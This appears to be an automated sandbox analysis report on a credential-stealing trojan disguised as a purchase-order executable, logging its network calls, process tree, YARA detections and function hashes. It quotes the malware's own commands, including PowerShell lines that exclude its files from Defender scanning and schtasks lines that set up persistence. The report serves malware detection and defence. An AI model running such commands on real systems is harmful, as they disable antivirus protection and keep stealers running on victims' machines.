Dec 31, 2024 09:06:53.694452047 CET	355	OUT	POST /fncvigkebkn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:53.694477081 CET	778	OUT	Data Raw: 5a c8 6f d5 02 10 13 b3 fe 02 00 00 1a 4c e2 86 e0 dd 1a a0 a5 78 67 f8 1f 2b db de 89 cf c5 c8 d3 a2 77 cc 03 60 ad 11 41 29 d4 ee 2e 13 79 03 e4 61 60 d6 d6 b7 b9 53 29 01 7a ef 40 8a 44 d7 19 f7 99 d5 fa 49 61 06 1d 2a bd ad 1e a0 ea 2a dc 9f Data Ascii: ZoLxg+w`A).ya`S)z@DIa*5Cg/'c-rlr4jCU>%F6]Sv/,N}F7jcr0NJ6V2Lr>/`qCq:h_6\i+;bhaug

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49752	188.114.96.3	443	2124	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:05:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-31 08:05:21 UTC	856	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:05:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 947110 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8o68%2F4D6jg0gBNRT6wiSRtJXv1TwBAFmfmae0RcvI7LqAI6aXgKuliGvCj2EatPLErTaftoLtcxkPCktSuO%2Fr11wzQFuVqnoWxPfTlD7piCIuAY3HY1IH1cwGcPNOgTDGm%2BZSZB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa8c3995ac24283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1613&rtt_var=624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1725768&cwnd=242&unsent_bytes=0&cid=7c01be5b485a7a8e&ts=188&x=0"
2024-12-31 08:05:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	03:05:00
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Imagebase:	0x980000
File size:	1'442'304 bytes
MD5 hash:	C12317B003EBC503C85BAB87C2104120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"
Imagebase:	0x710000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:05:03
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Imagebase:	0x930000
File size:	1'442'304 bytes
MD5 hash:	C12317B003EBC503C85BAB87C2104120
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'290'240 bytes
MD5 hash:	72BA8A03C7C6EFEED1AD022BBE6E4CAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
Imagebase:	0xba0000
File size:	1'442'304 bytes
MD5 hash:	C12317B003EBC503C85BAB87C2104120
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'225'728 bytes
MD5 hash:	73A5E8C4C9FBA1AD14C07468F41BFB78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:05:04
Start date:	31/12/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	1B7D1BBDA98AC1FED8DBC0B99926E47C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:05:05
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:	0x9e0000
File size:	70'656 bytes
MD5 hash:	E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:05:06
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Microsofts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Imagebase:	0x200000
File size:	98'816 bytes
MD5 hash:	F6B8018A27BCDBAA35778849B586D31B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2962626553.0000000002633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	03:05:06
Start date:	31/12/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	AC7FF2F8D7B75603AD58755D5762D640
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:05:08
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x710000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:05:08
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x710000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:05:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:05:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:05:15
Start date:	31/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	A24F8FAC0C18922003D041CBD7188CCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	03:05:15
Start date:	31/12/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'356'800 bytes
MD5 hash:	AF4EAE172A1ED3A96A4B508B5229B3B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:05:22
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp6E4E.tmp"
Imagebase:	0x710000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:05:22
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f330000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:05:23
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Imagebase:	0x410000
File size:	1'442'304 bytes
MD5 hash:	C12317B003EBC503C85BAB87C2104120
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:05:23
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\zeXKjViL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\zeXKjViL.exe"
Imagebase:	0x880000
File size:	1'442'304 bytes
MD5 hash:	C12317B003EBC503C85BAB87C2104120
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:05:49
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0xcf0000
File size:	665'670'656 bytes
MD5 hash:	B4B82042C00E471AC2399BADB63F1C10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	3

Executed Functions

Function 0596BFD0 Relevance: .7, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1760393104.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5960000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48546847fc77da85d66c98ff821271b31e4c3e8dc82a19dead2484875abc3ff1
Instruction ID: 5089c57771c68a080804c81ecb8ae45470b2cd5eacfb232ba9f073d110c48ff1
Opcode Fuzzy Hash: 48546847fc77da85d66c98ff821271b31e4c3e8dc82a19dead2484875abc3ff1
Instruction Fuzzy Hash: 1E521734A00605CFCB14DF68C588A6DB7F6FF89315F6585A8E44A9B761DB31EC8ACB40

Function 07AC3155 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f88a5018619f53c19d2d518f269209e4c393b937545f9cffa66852c7d071b1
Instruction ID: c76f67721aace7f34c311dfa06b1572ac8529758e7197cd00d3d4d715a26ecba
Opcode Fuzzy Hash: e9f88a5018619f53c19d2d518f269209e4c393b937545f9cffa66852c7d071b1
Instruction Fuzzy Hash: F8D06CB891E118EFCBA0DF55D8455B8BBB8BB0B300F05A099D81EA7262D7309881CE06

Function 015C6ECC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015C8829

Memory Dump Source

Source File: 00000000.00000002.1742668692.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15c0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7da9db9c385ae06e44e89d026886286d8a7448cd9696cb5c6ac53c63f048cbd2
Instruction ID: 4213d9b93b0fde291303ab118ec6d37b39541ab76d246f02e0ac4168d036968f
Opcode Fuzzy Hash: 7da9db9c385ae06e44e89d026886286d8a7448cd9696cb5c6ac53c63f048cbd2
Instruction Fuzzy Hash: FD41F0B0C00619CFDB24DFAAC844BDEBBF5BF48704F24846AD408AB255DB756945CF90

Function 07AC42E8 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 07AC434D

Memory Dump Source

Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 365c5612623ac48db47930b1ccd2a98a8e4e46d48105d5697a0849d1048c4683
Instruction ID: fcde7823573260b35ef75a299158936a97461173b2f0ad5f2c6b0468e0174c18
Opcode Fuzzy Hash: 365c5612623ac48db47930b1ccd2a98a8e4e46d48105d5697a0849d1048c4683
Instruction Fuzzy Hash: 8C11F5B58003499FDB10DF9AD545BDEFFF8EB48320F10841AD568A7600C375A584CFA5

Function 015CE260 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015CE2C6

Memory Dump Source

Source File: 00000000.00000002.1742668692.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15c0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6aedf6f4604f5bcd6b29adc0adb8febffe192c5fbb1acb7c7885938a3bce5711
Instruction ID: 50b2eba725efa57a8df84c8ef0a0df07bf15cdc4da3be9170be87cbfc0301422
Opcode Fuzzy Hash: 6aedf6f4604f5bcd6b29adc0adb8febffe192c5fbb1acb7c7885938a3bce5711
Instruction Fuzzy Hash: FF110FB5C002498FDB14DF9AD445BDEFBF5EB88220F10842AD568B7210C379A545CFA1

Function 07AC42F0 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 07AC434D

Memory Dump Source

Source File: 00000000.00000002.1784201616.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ac0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 40a45050936909a41178af8c1ea4c28dc16c50d9864bb9cbb2f5b02dae321c6d
Instruction ID: 61b218bd98bf3743aba1697a084c74803da7c640605a540be5dd16dd3ff1fa96
Opcode Fuzzy Hash: 40a45050936909a41178af8c1ea4c28dc16c50d9864bb9cbb2f5b02dae321c6d
Instruction Fuzzy Hash: 2E11C2B58002499FDB10DF9AD985BDEBFF8EB48320F148419D558A7210C375A544CFA5

Function 0119D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859a52faa6080cbec0cbde9b582c3ae8c28ad88e367ad0f683db9e36e3134cc1
Instruction ID: 25b978f64b698a74917f3c0f74925d3c825d532007928ea73909ab504b31684f
Opcode Fuzzy Hash: 859a52faa6080cbec0cbde9b582c3ae8c28ad88e367ad0f683db9e36e3134cc1
Instruction Fuzzy Hash: 47212871504204DFDF09DF58E9C0B66BF65FB94314F20C169D9094B656C336E456C7A2

Function 0119D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742034174.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_119d000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf750f82256ff2948cf2cde9393bba0b2cd2c8ba5aa4b9b9b018c3bbb699563
Instruction ID: 003cecb4969f29889c3b2f6e5c74a2a7aea4113579df4a552a472082ad0c6be6
Opcode Fuzzy Hash: ebf750f82256ff2948cf2cde9393bba0b2cd2c8ba5aa4b9b9b018c3bbb699563
Instruction Fuzzy Hash: 3D21F271504240DFEF09DF58EAC4B2ABF75FB88318F24C569E9094B256C336D456CBA2

Function 011AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc679d49e5b27e3d3d8e532bb82e3876e5a6e4adb4b751ef0ba07c6cc12d2f51
Instruction ID: 79f4f3310c218cf2f7159953a14e972ab1b9e2875357a2e40001ff9995943964
Opcode Fuzzy Hash: dc679d49e5b27e3d3d8e532bb82e3876e5a6e4adb4b751ef0ba07c6cc12d2f51
Instruction Fuzzy Hash: 73216778184600DFCF19DF58EAC0B26BF61FB84314F60C56DD8094B656C336C407CA62

Function 011AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742094048.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

